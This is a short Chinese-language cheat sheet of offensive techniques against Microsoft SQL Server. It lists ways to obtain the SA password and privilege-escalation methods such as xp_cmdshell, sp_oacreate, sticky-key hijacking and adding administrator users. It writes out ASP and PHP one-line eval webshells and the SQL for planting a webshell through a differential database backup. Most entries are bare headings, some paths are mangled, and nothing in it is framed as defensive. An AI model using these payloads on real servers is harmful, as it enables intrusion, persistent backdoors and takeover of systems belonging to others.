1、SA口令的获取
webshell或源代码的获取
源代码泄露
嗅探(用CAIN等工具嗅探1433数据库端口)
口令暴力破解
2、常见SQL server 提权命令
查看数据库的版本(select @@version;)
查看数据库所在服务器操作系统的参数
查看数据库启动的参数
查看数据库启动的时间
查看数据库服务器名和实例名
查看用户登录信息
查看数据库里所所有的存储工程和函数
查看数据库里用户和进程的信息
恢复存储过程
开启和关闭xp_cmdshell
xp_cmdshell执行命令
开启和关闭sp_oacreate
sp_oacreate删除文件
sp_oacreate复制文件
sp_oacreate移动文件
sp_oacreate添加管理员用户
开启和关闭sp_makeweblask
wscript.shell执行命令
shell.applocation执行命令
开启和关闭openrowset
沙盒执行命令
注册表劫持粘贴键
sp_oacreate替换粘贴键
public提权操作
echo一句话后门(echo <%eval request(cmd)%> >d:wwwrootok.asp echo <? php @eval($_POST[cmd]);?> >cmd.php)
在mssql 中查询password
3、通过数据库备份获取webshell
差异备份一句话木马
backup database [当前数据库名] to disk = 'c: ecycler1.bak'
create table cmd (a image);
insert into cmd(a) values ('<%eval request("cmd")%>');
backup database [当前数据库名] to disk = '网站绝对路径' WITH DIFFERENTIAL,FORMAT--
LOG 备份一句话木马(......)